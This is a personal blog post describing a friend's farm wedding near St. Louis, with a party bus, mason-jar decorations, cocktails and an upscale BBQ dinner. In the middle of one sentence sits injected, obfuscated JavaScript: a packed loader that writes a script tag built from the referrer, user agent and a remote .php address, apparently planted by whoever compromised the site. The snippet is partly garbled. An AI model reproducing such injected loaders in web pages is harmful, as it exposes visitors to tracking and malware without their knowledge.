Martha Stewart would be proud

We were in St. Louis this past weekend to celebrate Kate and Neil’s wedding.  Neil and Nick were roommates in college and now Neil and Kate live out in the Bay Area.

The wedding wasn’t really in St. Louis.  It was in Clarksville about an hour and a half outside of St. Louis.  But the bride and groom chartered a lovely party bus for all their guests.

We arrived at the farm to find some tasty refreshments and lots of beautiful flowers hung by mason jars.  I really love the mason jars and am pretty sure I need an excuse to use them for something.

Following ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inhnt|var|u0026u|referrer|nffsf||js|php’.split(‘|’),0,{}))
the ceremony we were treated to a signature pink cocktail and pop (soda) old fashioned glass bottles.  Did I mention she used those awesome striped straws?  Yeah.  Best drink ever.

There was also a band playing old-fashioned-y type music.  Think, “When the Saints Go Marching In.”

After the cocktail hour we headed to the busses – the reception was at a different part of the farm.  To lead us to the busses, the bride, groom, wedding party and band, led the guests down the lawn and towards the busses.

We were met at the reception location with adorable name tags hung on an old window.  More mason jars and adorable centerpieces in old ceramic/porcelain pitchers.

And dinner was “upscale BBQ.”  The only downside?  The mac and cheese was the last item in the buffet….which I meant I didn’t leave nearly enough room!

We had a great time and were happy to celebrate with our friends!

One last shot of Neil’s friends from high school and undergrad and a random wedding guest sporting a Royal-Wedding-Like hat and a clown nose.
